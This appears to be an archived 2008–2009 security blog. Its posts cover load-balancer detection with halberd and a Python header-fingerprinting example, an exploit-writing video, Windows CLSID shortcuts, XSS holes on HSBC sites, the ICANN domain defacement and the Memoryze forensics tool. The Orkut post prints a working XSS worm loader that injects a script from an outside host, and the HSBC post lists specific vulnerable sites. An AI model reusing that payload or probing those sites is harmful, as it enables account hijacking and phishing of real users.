Friday, June 26, 2009

Detecting Load Balancers

During a penetration test we may need to find out whether a site sits behind load balancers and how many there are. Working that out by hand is complicated, but there is a good tool that comes in handy: halberd.

installation
------------
# tar -xzvf halberd-0.2.3.tar.gz
# cd halberd-0.2.3
# python setup.py install

running:
--------
# halberd www.site.com
or
# halberd
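As an added illustration of what a tool like halberd looks for (this is not halberd's own code), the following clusters repeated responses to the same URL by signals that tend to differ per backend: Server banner, ETag, cookie names and clock skew between the server's Date header and our send time. The responses are constructed inline; the same logic shows a defender which headers to normalise if they do not want their own backends to be countable.

```python
# Added example: clusters repeated HTTP responses by backend-identifying
# signals (Server banner, ETag, cookie names, clock skew), which is the idea
# behind halberd. Samples are constructed; nothing is sent over the network.
import re
from collections import Counter
from email.utils import formatdate, parsedate_to_datetime

STABLE_HEADERS = ("Server", "ETag", "X-Powered-By")
COOKIE_NAME_RE = re.compile(r"^\s*([^=;\s]+)=")
SKEW_TOLERANCE = 5  # seconds; absorbs network jitter between requests


def clock_skew_bucket(local_epoch, headers):
    """Server Date minus our send time, bucketed so jitter does not split a backend."""
    date = headers.get("Date")
    if not date:
        return None
    skew = parsedate_to_datetime(date).timestamp() - local_epoch
    return round(skew / SKEW_TOLERANCE)


def fingerprint(local_epoch, headers):
    """Reduce one response to the values that tend to differ per backend."""
    cookie_names = tuple(sorted(
        m.group(1) for raw in headers.get("Set-Cookie", [])
        for m in [COOKIE_NAME_RE.match(raw)] if m))  # names only: values rotate
    return (tuple(headers.get(h) for h in STABLE_HEADERS),
            cookie_names, clock_skew_bucket(local_epoch, headers))


def cluster_backends(responses):
    """Count responses per fingerprint; each key is one probable backend."""
    return Counter(fingerprint(t, h) for t, h in responses)


def estimate_backends(responses):
    return len(cluster_backends(responses))


# Constructed sample: six requests one second apart, answered by three nodes
# that share a banner but differ in build, clock or cookie.
def _sample(epoch, server, etag, skew, cookie):
    return (epoch, {"Server": server, "ETag": etag, "Set-Cookie": [cookie],
                    "Date": formatdate(epoch + skew, usegmt=True)})

BASE = 1245974400  # 2009-06-26 00:00:00 GMT
SAMPLE_RESPONSES = [
    _sample(BASE + 0, "Apache/2.2.9", '"3a-1f2"', 0, "JSESSIONID=a1; Path=/"),
    _sample(BASE + 1, "Apache/2.2.9", '"3a-1f2"', 41, "JSESSIONID=b2; Path=/"),
    _sample(BASE + 2, "Apache/2.2.11", '"3a-1ff"', 0, "JSESSIONID=c3; Path=/"),
    _sample(BASE + 3, "Apache/2.2.9", '"3a-1f2"', 0, "JSESSIONID=d4; Path=/"),
    _sample(BASE + 4, "Apache/2.2.9", '"3a-1f2"', 42, "JSESSIONID=e5; Path=/"),
    _sample(BASE + 5, "Apache/2.2.11", '"3a-1ff"', 1, "JSESSIONID=f6; Path=/"),
]
```

Running `cluster_backends(SAMPLE_RESPONSES)` yields three fingerprints with two hits each; a real run would replace the constructed samples with headers captured from repeated requests.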

Saturday, January 24, 2009

[tut] Exploit writing tutorial

Here is a video of writing a small exploit.

Hope you will enjoy this.

http://rapidshare.com/files/186194137/exploit.part1.rar

http://rapidshare.com/files/186210843/exploit.part2.rar

http://rapidshare.com/files/186196866/exploit.part3.rar


[ low res ]

http://rapidshare.com/files/186713908/Destiny_media_player_BOF.wmv

Saturday, December 13, 2008

Fun with CLSID

My Computer

[Paste it in the Run box]
Explorer /E,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Explanation: The My Computer object is a namespace whose CLSID is {20D04FE0-3AEA-1069-A2D8-08002B30309D}.

Control Panel

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}

Explanation: The Control Panel object, whose CLSID is {21EC2020-3AEA-1069-A2DD-08002B30309D}, is a sub-object of My Computer.

Printers and telecopiers

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}

Fonts

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D20EA4E1-3957-11d2-A40B-0C5020524152}

Scanners and Cameras

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{E211B736-43FD-11D1-9EFB-0000F8757FCD}

Network Neighbourhood

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}

Administration Tools

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D20EA4E1-3957-11d2-A40B-0C5020524153}

Task Scheduler

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}

Web Folders

Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11D0-BCED-00A0C90AB50F}

My Documents

Explorer /N,::{450D8FBA-AD25-11D0-98A8-0800361B1103}

Recycle Bin

Explorer /N,::{645FF040-5081-101B-9F08-00AA002F954E}

Network Favorites

Explorer /N,::{208D2C60-3AEA-1069-A2D7-08002B30309D}

Default Navigator

Explorer /N,::{871C5380-42A0-1069-A2EA-08002B30309D}

Computer search results folder

Explorer /N,::{1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}

Network Search Results computer

Explorer /N,::{E17D4FC0-5564-11D1-83F2-00A0C90DC849}

Wednesday, November 5, 2008

HSBC web sites are open to critical XSS attacks. Warning to customers!

Evidently, multiple cross-site scripting vulnerabilities on bank web sites can have serious consequences. Everyone working in the security industry should consider XSS the phishers' weapon of the future.

Scammers can register domains and set up fake bank web sites in a few minutes. With the help of bulk e-mailers they can phish personal sensitive data from thousands of unsuspecting web users.

If they want to own HSBC's e-banking customers, all they have to do is to register a "suspicious" looking domain like hscsbc.com which is currently available and then serve a phishing page.
Even better, they can exploit a cross-site scripting vuln on hsbc.com, obfuscate the attack vector and significantly increase their phishing success rate!

Updated: 23/06/08:
www.investdirect.hsbc.gr XSS notified by Hexspirit
www.investdirect.hsbc.gr XSS notified by Hexspirit
www.hsbc.com.sv XSS notified by sl4xUz
www.hsbc.com XSS notified by Airrox
-
www.hsbc.co.uk XSS notified by PaPPy / unfixed
www.hsbc.com.tr XSS notified by DaiMon / unfixed since 26/05/2008
www.hbeu1.hsbc.com XSS notified by DaiMon / unfixed since 26/05/2008
www.hsbc.com.tr XSS notified by Babaconda / unfixed since 25/05/2008
www.hsbcprivatebankfrance.com XSS notified by ironzorg / unfixed since 25/04/2008
www.hsbc.fi.cr XSS notified by Venom23 / unfixed since 26/02/2008
www.hsbc.com XSS notified by Darkster / published on 26/07/2007 - fixed on 12/09/2007
monavenir.hsbc.fr XSS notified by takethis /published on 01/04/2007 - fixed on 21/08/2007

Protect your customers' privacy and security now! Leaving site-specific vulnerabilities open for days, weeks or months can lead to substantial financial losses! :-/

We suggest that you subscribe your online properties to the XSS early warning mailing list.

Related News (Updated):
"HSBC scripting flaws play into the hands of phishers", John Leyden, The Register, 25 Jun 08
"HSBC sites vulnerable to XSS flaws, could aid phishing attacks", Dancho Danchev, 29 Jun 08

ICANN and IANA domains hijacked by Turkish crackers

The ICANN and IANA websites were defaced earlier today by a Turkish group called "NetDevilz". ICANN is responsible for the global coordination of the Internet's system of unique identifiers. These include domain names, as well as the addresses used in a variety of Internet protocols.

The Internet Assigned Numbers Authority (IANA) is responsible for the global coordination of the DNS Root, IP addressing, and other Internet protocol resources.
Their domains were redirecting to a hosting space at "atspace.com" where the defacers left the following message:

"You think that you control the domains but you don't! Everybody knows wrong. We control the domains including ICANN! Don't you believe us?"

Hijacked domains include "icann.com", "icann.net", "iana.com" and "iana-servers.com".

We reached the defacers by email but they refused to tell us how they changed the DNS records; however, a cross-site scripting or cross-site request forgery vulnerability might have been exploited.

Here is the mirror of the ICANN.com defacement:
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,0/id,7635102/

You can have a look at their other defacements here:
http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,NetDevilz/

Original News:
http://www.zone-h.org/content/view/14973/1/

New Orkut XSS worm by Brazilian web security group

Security researchers Octane[F/X], Rodrigo Lacerda and Klay Gomes were able to hack Orkut again with their new XSS worm.
http://www.xssed.com/files/Image/xssworms/orkutxss.zip
The photo comment parameter was not properly filtered, which allowed insertion of this malicious script (a loader that appends a remote script element to the page's head):
---------------------
a=document.createElement('SCRIPT');a.src='http://octanefx.com/bugOrkut.js';document.getElementsByTagName('head').item(0).appendChild(a);

----------------------
This worm joined victims to several communities, left Orkut scraps for community members, added victims to friends lists, changed their profile pictures and infected all of their personal photos. As a result, anyone who visited an infected photo album got infected too.

Firefox users were vulnerable to attack. Opera and some versions of IE were not affected.

The good news is that it no longer works; Google once again fixed it in record time.

For educational purposes we uploaded a zip file containing all the worm's associated JavaScript codes.

Memoryze This

At the Hack in the Box security conference in Malaysia Wednesday, Mandiant’s Peter Silberman announced the release of Mandiant’s newest free tool for incident response and forensic investigations. The tool, Memoryze, is the latest memory analysis tool for first responders to consider adding to their toolkit for acquiring physical memory from running Windows systems. This summer, we saw the release of several other tools to do the same thing, but they stopped short at providing the ability to acquire a forensic image (or copy) of physical memory. Memoryze goes further and provides advanced analysis capabilities of both physical memory from live, running Windows systems and memory images previously acquired from running systems.

I spent a couple hours working with Memoryze in the wee hours of this morning and found it to be quite powerful. It acquires memory quickly and writes it in a raw format that can be read by the other memory analysis tools like the Volatility Framework. I tested Memoryze's ability to read physical memory images acquired by itself, Mantech’s mdd, Guidance Software's winen and win32dd. Note: For winen, I had to convert Encase format to a raw dd format using FTK Imager first. I didn't have any problems analyzing all four images acquired by the various tools. Additionally, I tested Volatility with similar success.